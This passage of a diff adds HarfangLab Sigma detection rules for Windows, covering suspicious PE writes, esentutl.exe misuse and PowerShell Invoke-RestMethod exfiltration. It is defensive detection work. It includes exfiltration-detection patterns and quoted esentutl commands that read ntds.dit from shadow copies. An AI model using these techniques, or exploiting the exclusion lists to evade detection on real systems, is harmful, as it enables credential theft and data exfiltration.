"errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "118fe9fa-f27d-4da6-bee4-85f73fe9c76c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + 
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.071551Z", + "creation_date": "2026-03-23T11:45:34.071553Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.071558Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1564/", + "https://attack.mitre.org/techniques/T1036/" + ], + "name": "t1564_pe_written_suspicious_location.yml", + "content": "title: PE File Written in Suspicious Location\nid: 118fe9fa-f27d-4da6-bee4-85f73fe9c76c\ndescription: |\n Detects the writing of a Portable Executable file in a suspicious location.\n Attacker can drop DLLs or PEs in unconventionnal directories to prevent security softwares or users seeing them.\n It is recommended to analyze the dropped file for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1564/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2023/07/10\nmodified: 2025/11/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564\n - attack.t1036\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: filesystem_write\n product: windows\ndetection:\n selection:\n FirstBytes|startswith: '4d5a'\n\n selection_appdata_1:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Roaming\\'\n filter_appdata_1:\n Path|startswith: 
'?:\\Users\\\\*\\AppData\\Roaming\\\\*\\'\n\n selection_appdata_2:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\'\n filter_appdata_2:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\\\*\\'\n\n selection_appdata_3:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Temp\\'\n filter_appdata_3:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\'\n\n selection_appdata_4:\n Path|startswith: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Content.Outlook\\'\n\n selection_winsxs:\n Path|startswith: '?:\\Windows\\WinSxS\\'\n filter_winsxs:\n Path|startswith: '?:\\Windows\\WinSxS\\\\*\\'\n\n selection_prefetch:\n Path|startswith: '?:\\Windows\\Prefetch\\'\n filter_prefetch:\n Path|startswith: '?:\\Windows\\Prefetch\\\\*\\'\n\n selection_tasks:\n Path|startswith: '?:\\Windows\\Tasks\\'\n filter_tasks:\n Path|startswith: '?:\\Windows\\Tasks\\\\*\\'\n\n selection_system32_tasks:\n Path|startswith: '?:\\Windows\\system32\\Tasks\\'\n filter_system32_tasks:\n Path|startswith: '?:\\Windows\\system32\\Tasks\\\\*\\'\n\n selection_debug:\n Path|startswith: '?:\\Windows\\debug\\'\n filter_debug:\n Path|startswith: '?:\\Windows\\debug\\\\*\\'\n\n selection_tracing:\n Path|startswith: '?:\\Windows\\tracing\\'\n filter_tracing:\n Path|startswith: '?:\\Windows\\tracing\\\\*\\'\n\n selection_help:\n Path|startswith: '?:\\Windows\\help\\'\n filter_help:\n Path|startswith: '?:\\Windows\\help\\\\*\\'\n\n selection_logs:\n Path|startswith: '?:\\Windows\\logs\\'\n\n selection_fonts:\n Path|startswith: '?:\\Windows\\Fonts\\'\n\n selection_programdata:\n Path|startswith: '?:\\ProgramData\\'\n filter_programdata:\n Path|startswith: '?:\\ProgramData\\\\*\\'\n\n selection_user:\n Path|startswith:\n - '?:\\Users\\\\*\\Music\\'\n - '?:\\Users\\\\*\\Videos\\'\n - '?:\\Users\\\\*\\Pictures\\'\n - '?:\\Users\\\\*\\Contacts\\'\n - '?:\\Users\\\\*\\3D Objects\\'\n - '?:\\Users\\\\*\\Saved Games\\'\n - '?:\\Users\\\\*\\Links\\'\n - '?:\\Users\\\\*\\Favorites\\'\n 
filter_user_1:\n Path|startswith:\n - '?:\\Users\\\\*\\\\*\\Music\\'\n - '?:\\Users\\\\*\\\\*\\Videos\\'\n - '?:\\Users\\\\*\\\\*\\Pictures\\'\n - '?:\\Users\\\\*\\\\*\\Contacts\\'\n - '?:\\Users\\\\*\\\\*\\3D Objects\\'\n - '?:\\Users\\\\*\\\\*\\Saved Games\\'\n - '?:\\Users\\\\*\\\\*\\Links\\'\n - '?:\\Users\\\\*\\\\*\\Favorites\\'\n # Filtering out folders with 2 or more levels of depth\n filter_user_2:\n Path|startswith:\n - '?:\\Users\\\\*\\Music\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Videos\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Pictures\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Contacts\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\3D Objects\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Saved Games\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Links\\\\*\\\\*\\'\n - '?:\\Users\\\\*\\Favorites\\\\*\\\\*\\'\n\n selection_inf:\n Path|startswith: '?:\\Windows\\INF\\'\n\n selection_config:\n Path|startswith: '?:\\Windows\\System32\\config\\'\n filter_config:\n Path|startswith: '?:\\Windows\\System32\\config\\\\*\\'\n\n selection_evt:\n Path|startswith: '?:\\Windows\\System32\\winevt\\'\n\n selection_public:\n Path|startswith: '?:\\Users\\Public\\'\n filter_public:\n Path|startswith: '?:\\Users\\Public\\\\*\\'\n\n selection_perflogs:\n Path|startswith: '?:\\Perflogs\\'\n filter_perflogs:\n Path|startswith: '?:\\Perflogs\\\\*\\'\n\n exclusion_system:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_qlive:\n ProcessImage|endswith: '\\QQLive.exe'\n Path: '?:\\ProgramData\\QLDZModule.dll'\n\n exclusion_sesame:\n ProcessImage|endswith: '\\Sesame.exe'\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\\\*.dll'\n\n exclusion_itextsharp:\n Path: '?:\\Windows\\Fonts\\itextsharp.dll'\n\n exclusion_logs_pbr:\n ProcessImage:\n - '?:\\Windows\\System32\\systemsettingsadminflows.exe'\n - '?:\\WINDOWS\\system32\\omadmclient.exe'\n - '?:\\Windows\\System32\\systemreset.exe'\n - '?:\\Windows\\System32\\resetengine.exe'\n Path: '?:\\Windows\\Logs\\PBR\\\\*'\n\n exclusion_fonts:\n Path:\n - '?:\\Windows\\Fonts\\\\*.fon'\n - 
'?:\\Windows\\Fonts\\\\*.fot'\n - '?:\\Windows\\Fonts\\\\*.rra'\n - '?:\\Windows\\Fonts\\is-*.tmp'\n\n exclusion_explorer:\n ProcessImage: '?:\\windows\\Explorer.EXE'\n\n # When downloading files from browsers they create temporary extensions for files\n # For caching and verification. This could be reduced to a \"Downloads\" folder only.\n exclusion_browser_extensions:\n Path|endswith:\n - '.crdownload' # Chrome\n - '.part' # Firefox\n - '.partial' # Edge\n - '.download' # Safari\n - '\\Downloads\\\\????????-????-????-????-????????????.tmp'\n\n exclusion_migration_service:\n Path: '?:\\ProgramData\\UserProfileMigrationService.exe'\n\n exclusion_4kviddl:\n Path|startswith: '?:\\Users\\\\*\\Music\\4kvideodownloader\\'\n\n exclusion_tmp:\n Path: '?:\\Users\\\\*\\AppData\\Local\\Z@H!-*-??.tmp'\n\n exclusion_public:\n Path:\n - '?:\\Users\\Public\\AnyDesk.exe'\n - '?:\\Users\\Public\\gcapi.dll'\n - '?:\\Users\\Public\\python.exe'\n - '?:\\Users\\Public\\splunkdd.exe'\n - '?:\\Users\\Public\\splunkd.exe'\n\n exclusion_roaming:\n Path:\n - '?:\\Users\\\\*\\AppData\\Roaming\\DPInst.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\gacutil.exe'\n - '?:\\Users\\\\*\\AppData\\Roaming\\PnPutil.exe'\n\n exclusion_uninstall:\n Path:\n # Files of the following format:\n # PyCharm2023.2_232.8660.197_Uninstall.exe\n - '?:\\ProgramData\\\\*20??.?_???.????.*_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*20??.?_???.????.*_Uninstall.exe'\n\n exclusion_winscp:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\winscp.rnd'\n\n exclusion_dotnet:\n Path|startswith:\n - '?:\\Users\\\\*\\\\*\\bin\\Debug\\net*\\'\n - '?:\\Users\\\\*\\\\*\\bin\\Release\\net*\\'\n\n exclusion_rollbacks:\n Path|startswith:\n - '?:\\Windows\\Logs\\PBR\\$Windows.~BT\\MigrationShims\\MigShim2\\'\n - '?:\\Windows\\Logs\\PBR\\$Windows.~BT_Rollback\\EFI\\Microsoft\\Boot\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\\\*\\MigrationShims\\MigShim2\\'\n - '?:\\Windows\\Logs\\PBR\\Panther\\Rollback\\EFI\\Microsoft\\Boot\\'\n - 
'?:\\Windows\\Logs\\PBR\\Panther\\_s_????.tmp'\n - '?:\\Windows\\Logs\\PBR\\Panther\\_s_???.tmp'\n\n exclusion_anydesk_dl:\n Path|endswith: '\\Downloads\\AnyDesk.exe'\n\n exclusion_redist:\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\TempDirectX?.EXE'\n - '?:\\Users\\\\*\\AppData\\Local\\TempDirectX??.EXE'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvcredist20??_x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvcredist20??_20??_20??_x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\TempVC_redist.x??.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvjredist64.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Tempvjredist.exe'\n\n exclusion_putty:\n Path: '?:\\Users\\\\*\\AppData\\Local\\PUTTY.RND'\n\n exclusion_sqlce:\n Path:\n - '?:\\Users\\\\*\\AppData\\Roaming\\sqlcecompact??.dll'\n - '?:\\Users\\\\*\\AppData\\Roaming\\sqlce????.dll'\n\n exclusion_clu:\n Path:\n - '?:\\Users\\\\*\\CLU_V*\\ComponentMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\expat.dll'\n - '?:\\Users\\\\*\\CLU_V*\\libexpat.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUdsCm.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUdsDm.dll'\n - '?:\\Users\\\\*\\CLU_V*\\PMUsrApi.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RDHWebSercieMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RdsMisc.dll'\n - '?:\\Users\\\\*\\CLU_V*\\restCdom.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RESTSDK.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RFUT.exe'\n - '?:\\Users\\\\*\\CLU_V*\\RInetwrp2.dll'\n - '?:\\Users\\\\*\\CLU_V*\\RInetwrp.dll'\n - '?:\\Users\\\\*\\CLU_V*\\ServerMgr.dll'\n - '?:\\Users\\\\*\\CLU_V*\\SnmpGet.exe'\n - '?:\\Users\\\\*\\CLU_V*\\soapCdom.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapCls2.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapCls.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapDms.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapProx.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUad.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUD.dll'\n - '?:\\Users\\\\*\\CLU_V*\\soapUds.dll'\n - '?:\\Users\\\\*\\CLU_V*\\unzip32.dll'\n - '?:\\Users\\\\*\\CLU_V*\\zip32.dll'\n\n exclusion_motic_drivers:\n Path|startswith: '?:\\Windows\\INF\\Motic 
Drivers\\'\n\n exclusion_aee_tools:\n Path: '?:\\Users\\\\*\\AppData\\Local\\AEE-Tools'\n\n exclusion_installshield_uninstallers:\n Path:\n - '?:\\ProgramData\\\\*????.?_*_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*????.?_*_Uninstall.exe'\n\n exclusion_polycom:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\PolycomCompanionSetup.exe'\n\n exclusion_bit_tmp:\n Path:\n - '?:\\ProgramData\\BIT????.tmp'\n - '?:\\ProgramData\\BIT???.tmp'\n\n exclusion_bluestacks_tmp:\n Path: '?:\\ProgramData\\BlueStacksServicesSetup.exe.tmp'\n\n exclusion_cardpresso:\n Path: '?:\\ProgramData\\cardPresso.bin'\n\n exclusion_generic_uninstaller:\n Path:\n - '?:\\ProgramData\\\\*20??.?_???.?????.??_Uninstall.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*20??.?_???.?????.??_Uninstall.exe'\n\n exclusion_keypass:\n Path:\n - '?:\\Users\\\\*\\KeePass Password Safe 2\\ShInstUtil.exe'\n - '?:\\Users\\\\*\\KeePass Password Safe 2\\unins000.exe'\n\n exclusion_setup_prod:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\SetupProd_Act.exe'\n\n exclusion_mtxagent:\n ProcessImage: '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin\\mtxagent.exe'\n ProcessSigned: 'true'\n\n # Just for fun: process used by the Spanish police to identify\n # users via their electronic identity card\n exclusion_dnieservice:\n Path: '?:\\Users\\\\*\\AppData\\Local\\DNIeService.exe'\n ProcessCommandLine: '?:\\windows\\system32\\svchost.exe -k netsvcs -s CertPropSvc'\n\n exclusion_ProfSvc:\n Path: '?:\\Users\\\\*\\AppData\\Local\\{????????-????-????-????-????????????}.tmp'\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n\n exclusion_msmpeng:\n ProcessOriginalFileName: 'MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_bomgar:\n ProcessImage|endswith:\n - '\\bomgar-scc.exe'\n - '\\sra-scc.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Bomgar Corporation'\n - 'BeyondTrust Corporation'\n Path:\n - 
'?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n - '?:\\ProgramData\\btsccoi-????????????????????????????????.exe'\n\n exclusion_bomgar_install:\n ProcessImage|endswith: '\\nstvstub.exe'\n ProcessCommandLine|contains|all:\n - ' --install '\n - ' --hwnd '\n Path: '?:\\ProgramData\\Z@S!-????????-????-????-????-????????????.tmp'\n\n exclusion_office_deployment_tool:\n ProcessImage|endswith: '\\officedeploymenttool_*.exe'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_mssense:\n ProcessImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_autobackup:\n ProcessOriginalFileName: 'AutoBackup?Pro.exe'\n ProcessSignature: 'Fabrice PARISOT'\n\n exclusion_tsplus:\n ProcessImage:\n - '?:\\Program Files\\TSplus\\UserDesktop\\files\\svcr.exe'\n - '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\svcr.exe'\n ProcessSignature: 'Remote Access World SAS'\n\n exclusion_installshield:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\InstallShield\\Engine\\\\*\\Intel*\\IKernel.exe'\n - '?:\\Program Files (x86)\\Common Files\\InstallShield\\Engine\\\\*\\Intel*\\IKernel.exe'\n\n exclusion_fastviewer:\n ProcessSigned: 'true'\n ProcessSignature: 'FastViewer GmbH'\n Path: '?:\\Users\\\\*\\Music\\exe\\\\*.tmp'\n\n exclusion_hp:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\SecondaryApp.exe'\n\n exclusion_hp_devicestup:\n ProcessImage: '?:\\Program Files\\HP\\HP * series\\Bin\\DeviceSetup.exe'\n Path: '?:\\Users\\\\*\\AppData\\Local\\Full_Webpack-* _Full_Webpack.exe'\n\n exclusion_msiexec:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Path|startswith: '?:\\Windows\\INF\\'\n\n exclusion_installer:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\7z*\\setup.exe'\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\\\*.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\\\*.exe'\n\n exclusion_eraser:\n 
ProcessImage|endswith: '\\Eraser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Rare Ideas, LLC'\n Path: '?:\\ProgramData\\\\*.dll'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n Path|endswith: '\\{????????-????-????-????-????????????}.tmp'\n\n # Behringer X-USB\n exclusion_behringer:\n ProcessImage:\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\ns?????.tmp\\ns?????.tmp'\n Path:\n - '?:\\ProgramData\\CNE???.tmp'\n - '?:\\ProgramData\\CNE????.tmp'\n\n # LANDesk® Management Suite\n exclusion_landesk:\n ProcessImage:\n - '?:\\Windows\\Temp\\inst32.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\inst32.exe'\n ProcessDescription: 'INSTALL MFC Application'\n Path: '?:\\Windows\\Fonts\\zch????.tmp'\n\n exclusion_phpstorm:\n ProcessImage|endswith: '\\PhpStorm-????.?.?.exe'\n ProcessDescription: 'PhpStorm Windows Installer'\n Path|endswith: '\\PhpStorm????.?_*_Uninstall.exe'\n\n exclusion_proxynetworks:\n ProcessImage|endswith: '\\PhSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Proxy Networks Inc.'\n Path: '?:\\ProgramData\\PHodCln-{????????-????-????-????-????????????}.exe'\n\n exclusion_magic:\n ProcessImage:\n - '?:\\Program Files\\MagicUtilities\\MagicMouseUtilities.exe'\n - '?:\\Program Files\\MagicUtilities\\MagicTrackpadUtilities.exe'\n - '?:\\Program Files\\MagicUtilities\\MagicKeyboardUtilities.exe'\n Path: '?:\\ProgramData\\fnebeqbh.fxh'\n\n exclusion_image:\n ProcessImage:\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Program Files\\7-Zip\\7zG.exe'\n\n condition: selection and 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "118fe9fa-f27d-4da6-bee4-85f73fe9c76c", + "rule_name": "PE File Written in Suspicious Location", + "rule_description": "Detects the writing of a 
Portable Executable file in a suspicious location.\nAttacker can drop DLLs or PEs in unconventionnal directories to prevent security softwares or users seeing them.\nIt is recommended to analyze the dropped file for malicious content.\n", + "rule_creation_date": "2023-07-10", + "rule_modified_date": "2025-11-26", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1036", + "attack.t1564" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "11f7107e-28d1-4486-afca-4379b68744b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.627287Z", + "creation_date": "2026-03-23T11:45:34.627289Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.627293Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Esentutl/", + "https://attack.mitre.org/techniques/T1218/", + "https://attack.mitre.org/techniques/T1564/004/", + "https://attack.mitre.org/techniques/T1570/", + "https://attack.mitre.org/techniques/T1105/", + 
"https://attack.mitre.org/software/S0404/" + ], + "name": "t1218_esentutl.yml", + "content": "title: Esentutl.exe Execution\nid: 11f7107e-28d1-4486-afca-4379b68744b3\ndescription: |\n Detects the execution of esentutl.exe, a legitimate Windows database utility.\n Adversaries may misuse this tool to manipulate files, access sensitive data, or disable security measures.\n It is recommended to investigate the legitimacy of the esentutl.exe execution and review file accesses.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Esentutl/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1564/004/\n - https://attack.mitre.org/techniques/T1570/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0404/\ndate: 2021/07/09\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1564.004\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - attack.s0404\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\esentutl.exe'\n - OriginalFileName: 'esentutl.exe'\n\n # This is handled by the rule 8610a64e-eb0f-436c-b21d-33f757ea41f0\n filter_vss:\n CommandLine|contains|all:\n - ' /y '\n - ' /vss '\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Program Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n - '?:\\ProgramData\\Cyvera\\LocalSystem\\Download\\protected_payload_execution\\cortex-xdr-payload.exe'\n - '?:\\Program Files\\HDCleaner\\HDCleaner.exe'\n - '?:\\Program Files\\Magnet Forensics\\Magnet AXIOM\\AXIOM Process\\AXIOMProcess.exe'\n - '?:\\Program Files\\Symantec\\Backup Exec\\beremote.exe'\n\n 
exclusion_commandline:\n CommandLine:\n - 'esentutl.exe'\n - 'esentutl /g'\n - 'esentutl.exe /d ?:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb'\n\n exclusion_arcserve_backup:\n ParentImage: '?:\\Program Files\\CA\\SharedComponents\\ARCserve Backup\\UniAgent\\caagstart.exe'\n # C:\\Windows\\system32\\esentutl /K \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy89\\Windows\\NTDS\\edb06C20.log\n # C:\\Windows\\system32\\esentutl /K \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy103\\Windows\\NTDS\\ntds.dit\n CommandLine:\n - '?:\\Windows\\system32\\esentutl /K *\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\NTDS\\edb*.log'\n - '?:\\Windows\\system32\\esentutl /K *\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\Windows\\NTDS\\ntds.dit'\n\n # Microsoft File Replication Service\n exclusion_ntrfs:\n ParentImage: '?:\\Windows\\System32\\ntfrs.exe'\n CommandLine: 'esentutl /d ?:\\windows\\ntfrs\\jet\\ntfrs.jdb'\n\n exclusion_edblog:\n CommandLine:\n - '?:\\Windows\\system32\\esentutl.exe /? edb.log'\n - '?:\\Windows\\system32\\esentutl.exe /?? 
edb.log'\n\n exclusion_veritas_backup:\n ParentImage: '?:\\Program Files\\Veritas\\Backup Exec\\raws\\beremote.exe'\n GrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "11f7107e-28d1-4486-afca-4379b68744b3", + "rule_name": "Esentutl.exe Execution", + "rule_description": "Detects the execution of esentutl.exe, a legitimate Windows database utility.\nAdversaries may misuse this tool to manipulate files, access sensitive data, or disable security measures.\nIt is recommended to investigate the legitimacy of the esentutl.exe execution and review file accesses.\n", + "rule_creation_date": "2021-07-09", + "rule_modified_date": "2026-02-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion", + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1105", + "attack.t1218", + "attack.t1564.004", + "attack.t1570" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "12043ba4-4c8f-42df-8036-1677ede6fb84", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + 
"rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.623724Z", + "creation_date": "2026-03-23T11:45:34.623727Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623731Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod?view=powershell-7.5", + "https://attack.mitre.org/techniques/T1059/001/", + "https://attack.mitre.org/techniques/T1567/" + ], + "name": "t1059_001_data_exfiltration_invoke_restmethod.yml", + "content": "title: Data Exfiltration via Invoke-RestMethod\nid: 12043ba4-4c8f-42df-8036-1677ede6fb84\ndescription: |\n Detects attempts to exfiltrate data via PowerShell using the Invoke-RestMethod cmdlet with an HTTP POST to an external server.\n Attackers can use this command to exfiltrate sensitive data, as was observed in the attack against the energy sector in Poland in 2025.\n It is recommended to investigate the context surrounding this command and verify the legitimacy of the remote server involved in the request.\nreferences:\n - https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf\n - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-restmethod?view=powershell-7.5\n - https://attack.mitre.org/techniques/T1059/001/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2026/01/30\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n 
PowershellCommand|contains|all:\n - 'Invoke-RestMethod '\n - ' -Ur' # -Uri\n - ' -Me' # -Method\n - ' -I' # -InFile\n - ' POST'\n ScriptNumberOfLines: 1\n\n filter_script:\n PowershellScriptPath|contains: '?'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "12043ba4-4c8f-42df-8036-1677ede6fb84", + "rule_name": "Data Exfiltration via Invoke-RestMethod", + "rule_description": "Detects attempts to exfiltrate data via PowerShell using the Invoke-RestMethod cmdlet with an HTTP POST to an external server.\nAttackers can use this command to exfiltrate sensitive data, as was observed in the attack against the energy sector in Poland in 2025.\nIt is recommended to investigate the context surrounding this command and verify the legitimacy of the remote server involved in the request.\n", + "rule_creation_date": "2026-01-30", + "rule_modified_date": "2026-03-17", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.exfiltration" + ], + "rule_technique_tags": [ + "attack.t1059.001", + "attack.t1567" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "12345a32-eabd-4124-ad05-d724d29e4fd1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + 